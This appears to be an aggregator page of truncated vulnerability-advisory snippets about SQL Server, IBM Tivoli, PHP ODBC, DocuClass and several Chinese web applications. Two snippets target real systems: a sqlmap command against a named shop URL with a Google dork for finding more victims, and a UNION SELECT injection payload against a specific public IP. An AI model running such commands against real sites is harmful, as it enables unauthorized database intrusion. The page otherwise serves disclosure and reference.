CVE-2016-3059
CVE-2016-3059 affects IBM Tivoli Storage Manager for Databases (IBM Spectrum Protect for Databases) and IBM Tivoli Storage FlashCopy Manager for Microsoft SQL Server (IBM Spectrum Protect Snapshot). The vulnerability allows local users to disclose the cleartext SQL Server password by reading the ...
CVE-2016-3059
IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka IBM Spectrum Protect for Databases 6.3 before 6.3.1.7 and 6.4 before 6.4.1.9 and Tivoli Storage FlashCopy Manager for Microsoft SQL Server aka IBM Spectrum Protect Snapshot 3.1 before 3.1.1.7 and 3.2 before...
CIMA DocuClass ECM - Multiple Vulnerabilities
Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on: Microsoft Windows 2008 R2 DocuClass is a modular and...
Vulnerability of Microsoft SQL Server software, allowing a malicious entity to compromise the accessibility of protected information
There is a vulnerability in SQL Server that can cause a service failure. If exploited successfully, a malicious individual can trigger a server failure before it can be restarted manually...
Vulnerability of Microsoft SQL Server software, allowing a malicious entity to compromise protected information
Cross-site scripting in SQL Master Data Services (MDS) allows a malicious actor to inject a script into a user’s Internet Explorer. With the help of this script, a malicious actor can replace the content on the website, gain access to confidential information, or perform any action on th...
CIMA DocuClass ECM - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on:...
CIMA DocuClass ECM - Multiple Vulnerabilities
CIMA DocuClass ECM - Multiple Vulnerabilities Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on: Microsoft...
Microsoft SQL Server Login Possible
Binary data mssqllogin.nbin...
The vulnerability of the PHP interpreter, which allows a hacker to trigger a service failure
The vulnerability in the odbc_bindcols function (ext/odbc/php_odbc.c) in the PHP interpreter arises due to incorrect handling of the SQL_WVARCHAR column by the driver. Exploiting this vulnerability can allow an attacker, operating remotely, to cause a service failure (application termination) by using t...
PHP 'odbc_bindcols' Function Denial of Service Vulnerability
PHP (PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language maintained by the PHP Group and the open source community. The language supports multiple syntaxes, multiple databases and operating systems, and support for C, C++ for program extensions and so on. A...
CVE-2015-8879
The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain...
How to Export SQL Logs
Purpose This article documents how to export logs from the two SQL database engines used by Veeam Backup & Replication: Microsoft SQL Server PostgreSQL Solution Microsoft SQL Server Log Collection The following steps require Microsoft SQL Server Management Studio SSMS. 1. Open Microsoft SQL Serve...
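Haitian OA /loginverify.asp /LosePassAction.asp: two POST-type SQL injections
0x01 Vulnerability overview Submitted: 2014-05-25 Disclosed: 2014-08-21 Vulnerability type: SQL injection Beijing Lianjie Haitian Technology Co., Ltd. is a high-tech company specializing in application software development and integration services. It develops and sells a series of software products based on Internet/Intranet technology for enterprises and public institutions of all kinds, and is committed to informatization and office automation for government agencies and enterprises. Drawing on its development experience on Microsoft system platforms, Lianjie has successfully launched enterprise-level network application systems based on the Internet/Intranet platform. Its flagship software "Haitian OA"...
V5shop: SQL injection vulnerability in the spikeid parameter of cart.aspx
Example: search Google for inurl:productpic.aspx; cart.aspx normally requires a login to access, but this has no effect on the injection. Case: http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...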
The vulnerability of the Microsoft SQL Server relational database management system allows attackers to enhance their privileges.
The vulnerability of the Microsoft SQL Server relational database management system is related to errors that occur during the operation of pointers. Exploiting this vulnerability can allow an attacker, operating remotely, to increase their privileges...
The vulnerability of the Microsoft SQL Server relational database management system allows a hacker to execute arbitrary code.
The vulnerability of the Microsoft SQL Server relational database management system is related to the absence of forced blocking of access to uninitialized memory areas. Exploiting this vulnerability allows a malicious actor to execute arbitrary code using a specially crafted query from a remote...
Yonyou GRP system SQL injection
Brief description: Yonyou GRP system SQL injection Details: Yonyou GRP system SQL injection Link: http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=42 Injection parameter: Payload: infoid=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR113+CHAR98+CHAR113+CHAR118+CHAR113+CHAR74+CHAR98+CHAR75+CHAR...
Design/Logic Flaw
IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...
CVE-2015-7404
CVE-2015-7404 affects IBM Tivoli Storage Manager products (Databases for SQL Server, Mail for Exchange, and FlashCopy Manager) when application tracing is enabled. The root issue is that the Change TSM Password operation (changetsmpassword) writes passwords in plaintext to application trace outpu...